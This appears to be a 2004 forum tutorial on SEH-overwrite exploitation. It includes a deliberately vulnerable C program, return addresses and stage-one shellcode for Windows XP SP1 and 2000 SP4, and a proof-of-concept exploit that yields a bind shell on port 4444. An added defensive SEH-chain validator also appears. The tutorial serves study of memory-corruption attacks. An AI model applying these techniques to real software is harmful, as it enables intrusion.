Exploiting Default Exception Handler to Increase Exploit Sta

韩冰
Posted on 2004-11-19 10:39
The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every Windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address; in this case we continue overwriting the stack and overwrite the default exception handler as well.

[Buf] <- Shellcode
[Return Address] <- jmp register (for Windows XP SP1)
[Various Stack Data] <- Junk
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
[SE Handler] <- jmp register (for Win2k SP4)
[Stage1 Shellcode] <- stage1 shellcode for Win2k

If the first return address (Windows XP SP1) is wrong, an exception will occur and the default exception handler will be called (Windows 2000 SP4), thus allowing us to create a stable exploit with two return addresses.

Necessary Tools:
- OllyDBG
- C/C++ Compiler
- nasm
- Sac

Vulnerable Code:
//lamebuf.c
#include<stdio.h>
#include<string.h>
#include<windows.h>
int main(int argc,char *argv[]){

    char buf[512];
    char buf1[1024]; // <- simulate a stack
    //DebugBreak();
    if (argc != 2){ return -1; }

    strcpy(buf,argv[1]); // unbounded copy of argv[1] into the 512-byte buf: this is the overflow
    return 0x0;
}

Getting Started:
Before writing the exploit, let's see what happens when we overflow this application with 1600 bytes. The application crashed with the following register state:

EAX 00000000
ECX 00321404
EDX 00414141
EBX 7FFDF000
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
EDI 77F59037 ntdll.77F59037
EIP 41414141

Let's take a look at the stack and see what happened to the default exception handler:
0x0012FFB0 41414141 Pointer to next SEH Record
0x0012FFB4 41414141 SE Handler

We successfully overwrote the return address and the default exception handler.

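The dump above shows both fields of the registration record overwritten with 0x41414141. As an added example (not code from the original post), this is the kind of chain validation a simplified SafeSEH/SEHOP-style defence performs before dispatching a handler, run over a simulated 32-bit stack; the stack window, the module address range, and the write_record/validate_seh_chain helpers are constructed assumptions, not Windows APIs.

```c
#include <stdint.h>
#include <string.h>
/* One EXCEPTION_REGISTRATION record as laid out on the x86 stack:
 * [pointer to next record][handler]; the last record's next is 0xFFFFFFFF. */
typedef struct { uint32_t next; uint32_t handler; } seh_record_t;

/* Constructed 32-bit memory model: a 4 KiB stack window around the post's
 * 0x0012FFxx addresses, and an assumed range standing in for a loaded
 * module such as ntdll (where a legitimate handler would live). */
#define STACK_BASE 0x0012F000u
#define STACK_SIZE 0x1000u
#define MODULE_LO  0x77F50000u
#define MODULE_HI  0x77FFF000u
#define CHAIN_END  0xFFFFFFFFu

enum { SEH_OK = 0, SEH_HANDLER_ON_STACK, SEH_HANDLER_UNKNOWN,
       SEH_BAD_NEXT, SEH_LOOP, SEH_NO_TERMINATOR };
static uint8_t stack_mem[STACK_SIZE];
static int in_stack(uint32_t a)  { return a >= STACK_BASE && a < STACK_BASE + STACK_SIZE; }
static int in_module(uint32_t a) { return a >= MODULE_LO && a < MODULE_HI; }

/* Store a record in the simulated stack (used to build the sample chains). */
void write_record(uint32_t addr, uint32_t next, uint32_t handler) {
    seh_record_t r = { next, handler };
    memcpy(stack_mem + (addr - STACK_BASE), &r, sizeof r);
}

static int read_record(uint32_t addr, seh_record_t *out) {
    if (!in_stack(addr) || !in_stack(addr + sizeof *out - 1)) return 0;
    memcpy(out, stack_mem + (addr - STACK_BASE), sizeof *out);
    return 1;
}
/* Walk the chain from `head` the way simplified SafeSEH/SEHOP checks do: each
 * handler must be in a module (never on the stack), each next pointer must
 * stay on the stack and move upward, and the walk must reach CHAIN_END.
 * Returns SEH_OK or the first anomaly found. */
int validate_seh_chain(uint32_t head) {
    uint32_t cur = head;
    for (int n = 0; n < 64; n++) {   /* bound the walk: a cycle must not hang us */
        seh_record_t r;
        if (!read_record(cur, &r)) return SEH_BAD_NEXT;
        if (in_stack(r.handler)) return SEH_HANDLER_ON_STACK;
        if (!in_module(r.handler)) return SEH_HANDLER_UNKNOWN;
        if (r.next == CHAIN_END) return SEH_OK;
        if (r.next <= cur) return SEH_LOOP;
        cur = r.next;
    }
    return SEH_NO_TERMINATOR;
}
```

Fed the record the post builds for Windows 2000 (handler = jmp ebx inside ntdll, next = 0xcccc06EB), the in-module handler passes, but the next pointer leaves the stack so the walk never reaches the terminator and the chain is rejected.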
Primary Return Address (Windows XP SP1 EN):
The first return address will be called as in a normal stack overflow. We can see that ESP points to user input, so we will use that as our first-stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 EN), and our first-stage shellcode will be:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"

Secondary Return Address (Windows 2000 SP4 EN):
The secondary return address will be called as in a normal SEH overwrite. The return address will be 0x77F92A9B (jmp ebx on Win2k SP4 EN), and our first-stage shellcode will be:
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"

Proof Of Concept:
// exploit.c
// Tal zeltzer - [Double Return] //

#include<stdio.h>
#include<string.h>
#include<windows.h>
#include<process.h> // execve()

#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

// Stage1 For WinXP Sp1 English
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

// Stage1 For Win2k Sp4 English
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
unsigned char shellcode[] = ""; // PLACEHOLDER: encoded payload bytes omitted

int main(int argc,char *argv[]){

    char *bufExe[3];
    char buf[2048];
    bufExe[0] = "lamebuf.exe";
    bufExe[2] = NULL;

    memset(buf,0x0,sizeof(buf));
    memset(buf,0x90,1652);
    memcpy(&buf[24],shellcode,sizeof(shellcode)-1);

    memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode
    memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage1 Shellcode (stage1_2)

    *(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en
    *(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code
    *(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en

    bufExe[1] = buf;
    //Execute the vulnerable application
    execve(bufExe[0],bufExe,NULL);

    return 0x0;
}

Exploit under Windows XP SP1:
C:\>exploit

C:\>telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Exploit under Windows 2000 SP4:
C:\>exploit

C:\>telnet 127.0.0.1 4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.